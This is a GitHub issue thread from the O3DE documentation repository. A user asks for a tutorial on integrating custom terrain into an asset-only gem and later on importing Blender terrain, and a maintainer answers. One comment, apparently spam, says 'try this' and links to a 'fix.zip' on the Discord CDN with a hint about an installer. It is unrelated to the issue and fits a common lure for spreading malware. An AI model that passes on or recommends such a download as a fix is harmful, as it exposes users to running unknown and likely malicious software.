### ISSUE TITLE
[DOCS] Custom Asset Example that shows integrating a custom Terrian into an Asset only gem

### ISSUE THREAD

**Issue by Mechazo11** [o3de/o3de.org#2591]
## Describe the issue briefly

Custom Asset Example Gem page https://docs.o3de.org/docs/user-guide/gems/reference/assets/custom-asset-example/ is present but shows no example. I think building off the tutorial in https://www.docs.o3de.org/docs/learning-guide/tutorials/environments/create-terrain-from-images/, a tutorial showing how to take this custom terrian and integrating it into an Asset-only custom gem will be very helpful for folks who are looking to use ROS 2 Gem and PhysX5 Gem for robotics simulations.

## Which page(s) / section(s) are affected?

* https://docs.o3de.org/docs/user-guide/gems/reference/assets/custom-asset-example/

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ShaunaGordon** [comment]
That page is part of the Gem reference, which provides general information about the Gems that ship with O3DE, so this would be the wrong place for a tutorial. However, a tutorial could be added to the Tutorials section and then linked from here. 

As an aside, more information about the Gems more generally would be useful in this section, even if more technical in nature.

**Comment by Mechazo11** [comment]
@ShaunaGordon I ended up generating a basic Terrain using Blender and exporting it in as `.fbx`. But when I try to drag and drop it into O3DE, the textures are missing. Given I have a 3D model in metric scale in blender, what would be the correct workflow to make it into a Prefab in O3DE? Is it 3d model --> export to `.fbx` (no mesh or materials) --> import as entity in Open 3D Engine --> Generate material? 
I know this question is not related but I feel like this and the problem I raised the question about may share the same steps and as far as I know, such a tutorial is not available in O3DE's docs.

**Comment by ShaunaGordon** [comment]
I agree with your assessment that that question is tangential, but also good fodder for adding to the docs, given how common a flow that is. I don't know the answer to your question offhand, but I know there are a number of subject matter experts on this one in the Discord server (if you haven't joined already, I highly encourage doing so; you can find the invite link on o3de.org), so let me ping them about it and see what I can dig up.

**Comment by Mechazo11** [comment]
Hi @ShaunaGordon since we last spoke, I was able to figure out the pipeline (sort of) and developed a new test environment (sort of) for a NASA Simulation competition (https://github.com/Mechazo11/MarsYardGem) (still a work in progress). This testbed does not use the Terrian Gem which I think would have been the right tool for this job.

I really appreciate the help. I will be closing the issue for the time being but if you and/or more senior developers would be willing to making this tutorial, I will be very happy to help out. A major candidate for using the Terrian Gem would be NASA's publicly available height map for the [Gale Crater](https://nasa3d.arc.nasa.gov/detail/CuriosityQR)

**Comment by ShaunaGordon** [comment]
@Mechazo11 Alright. 

For history sake, and maybe this will help you, too, there's a Blender Bridge that might be helpful, it's maintained by a member of both the O3DE and Blender communities - https://github.com/kursad-k/o3de_blender_bridge
